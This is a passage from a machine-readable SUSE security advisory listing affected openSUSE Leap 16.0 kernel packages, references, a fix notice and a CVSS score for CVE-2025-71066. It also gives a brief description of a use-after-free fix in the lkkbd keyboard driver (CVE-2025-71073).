"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71066",
"url": "https://www.suse.com/security/cve/CVE-2025-71066"
},
{
"category": "external",
"summary": "SUSE Bug 1256645 for CVE-2025-71066",
"url": "https://bugzilla.suse.com/1256645"
},
{
"category": "external",
"summary": "SUSE Bug 1258005 for CVE-2025-71066",
"url": "https://bugzilla.suse.com/1258005"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T13:03:55Z",
"details": "important"
}
],
"title": "CVE-2025-71066"
},
{
"cve": "CVE-2025-71073",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71073"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nInput: lkkbd - disable pending work before freeing device\n\nlkkbd_interrupt() schedules lk-\u003etq via schedule_work(), and the work\nhandler lkkbd_reinit() dereferences the lkkbd structure and its\nserio/input_dev fields.\n\nlkkbd_disconnect() and error paths in lkkbd_connect() free the lkkbd\nstructure without preventing the reinit work from being queued again\nuntil serio_close() returns. This can allow the work handler to run\nafter the structure has been freed, leading to a potential use-after-free.\n\nUse disable_work_sync() instead of cancel_work_sync() to ensure the\nreinit work cannot be re-queued, and call it both in lkkbd_disconnect()\nand in lkkbd_connect() error paths after serio_open().",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
